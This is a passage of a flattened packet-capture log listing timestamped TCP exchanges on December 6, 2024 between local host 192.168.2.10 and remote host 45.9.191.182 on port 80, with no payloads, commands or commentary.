                                Dec 6, 2024 11:05:31.725769043 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.725838900 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.727045059 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.727130890 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.727190018 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.728316069 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.728353977 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.728430033 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.770653009 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.851270914 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.851471901 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.851878881 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.852006912 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.852015018 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.852953911 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.853010893 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.853076935 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.853127956 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.853988886 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.854108095 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.854157925 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.855112076 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.855258942 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.855304956 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.856142998 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.856229067 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.856273890 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.857317924 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.857337952 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.858760118 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.858818054 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.858840942 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.859406948 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.859462023 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.859559059 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.859607935 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.860500097 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.860627890 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.860671997 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.861615896 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.861665964 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.861712933 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.862677097 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.862795115 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.863550901 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.863775969 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.863847971 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.863892078 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.864856958 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.864976883 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.866014004 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.866070032 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.866137981 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.867021084 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.867077112 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.867091894 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.867142916 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.868098974 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.868153095 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.868207932 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.869205952 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.869299889 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.869348049 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.870269060 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.870371103 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.870417118 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.871376038 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.871537924 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.871594906 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.872463942 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.872566938 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.872610092 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.873527050 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.873630047 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.873681068 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.874594927 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.874716043 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.874758959 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.875693083 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.875844955 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.875890970 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.876804113 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.876920938 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.876966000 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.877981901 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.877994061 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.878030062 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.878979921 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.879075050 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.879189968 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.880244970 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.880328894 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.880389929 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.881159067 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.881316900 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.881386042 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.882231951 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.882333994 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.882407904 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.883373022 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.883449078 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.883524895 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.884403944 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.884601116 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.885503054 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.885555983 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.885564089 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.885628939 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.886555910 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.886662006 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.886704922 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.887655020 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.887736082 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.887773037 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.888752937 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.888885975 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.888926029 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.889837027 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.889916897 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.889969110 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.890943050 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.891056061 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.891103983 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.892031908 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.892163992 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.892215967 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.893105984 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.893271923 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.893317938 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.894220114 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.894365072 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.894411087 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.895277023 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.895412922 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.895458937 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.896363974 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.896496058 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.896543026 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.897429943 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.897562027 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.897607088 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.898519039 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.898667097 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.898715019 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.899655104 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.899854898 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.899928093 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.900732994 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.900892973 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.900949001 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.901822090 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.902060032 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.902116060 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.902899027 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.903039932 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.903086901 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.904004097 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.904234886 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.904283047 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.905041933 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.905292034 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.905343056 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.906162024 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.906291008 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.906337976 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.907253981 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.907309055 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.907352924 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:31.908269882 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:31.958189011 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.043884039 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.044117928 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.044192076 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.044261932 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.044414997 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.044543028 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.045473099 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.045794964 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.045841932 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.045959949 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.046003103 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.046044111 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.047008038 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.047143936 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.047188997 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.048083067 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.048187017 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.048232079 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.049197912 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.049314976 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.049385071 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.050251007 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.050363064 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.050405025 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.051333904 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.051490068 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.051532984 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.052438021 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.052567005 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.052668095 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.053576946 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.053625107 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.053694010 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.054636002 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.054799080 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.054850101 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.055759907 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.055917025 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.055962086 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.056994915 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.057065010 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.057113886 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.057873964 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.058151960 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.058198929 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.058984041 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.059161901 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.059207916 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.060041904 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.060179949 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.060224056 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.061136961 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.061269999 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.061312914 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.062262058 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.062446117 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.062495947 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.063319921 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.063436031 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.063482046 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.064387083 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.064505100 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.064548016 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.065488100 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.065530062 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.065577030 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.066601992 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.066692114 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.066737890 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.067668915 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.067825079 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.067871094 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.068769932 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.068873882 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.068913937 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.069849968 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.069955111 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.070005894 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.073585033 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.073610067 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.073653936 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.073666096 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.073678017 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.073689938 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.073714972 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.073863983 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.073908091 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.074872971 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.075027943 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.075069904 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.076030970 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.076042891 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.076078892 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.076950073 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.077106953 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.077156067 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.078151941 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.078305006 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.078349113 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.079471111 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.079483986 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.079529047 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.080177069 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.080192089 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.080230951 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.080712080 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.081285000 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.081332922 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.083666086 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.083678961 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.083712101 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.084100008 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.084111929 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.084146023 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.084692001 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.084705114 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.084763050 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.085788965 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.085949898 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.085993052 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.086911917 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.086925030 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.086966038 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.087851048 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.088013887 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.088056087 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.088946104 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.089099884 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.089143991 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.090023041 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.090184927 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.090229034 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.091139078 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.091303110 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.091353893 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.092396975 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.092408895 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.092452049 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.093358994 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.093523979 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.093566895 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.094471931 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.094482899 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.094525099 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.095464945 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.095477104 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.095514059 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.096425056 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.096573114 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.096612930 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.097636938 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.097806931 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.097848892 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.098812103 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.098824978 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.098860979 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.100266933 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.100282907 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.100322962 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.100855112 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.145654917 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.236767054 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.236787081 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.236887932 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.236932993 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.237111092 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.237159967 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.237807989 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.237864971 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.237909079 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.238667011 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.238717079 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.238761902 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.239340067 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.239420891 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.239464045 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.240386009 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.240518093 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.240562916 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.241475105 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.241559982 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.241605997 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.242569923 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.242688894 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.242732048 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.243628979 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.243745089 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.243786097 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.244729996 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.244849920 CET804970845.9.191.182192.168.2.10
                                Dec 6, 2024 11:05:32.244899035 CET4970880192.168.2.1045.9.191.182
                                Dec 6, 2024 11:05:32.245799065 CET804970845.9.191.182192.168.2.10
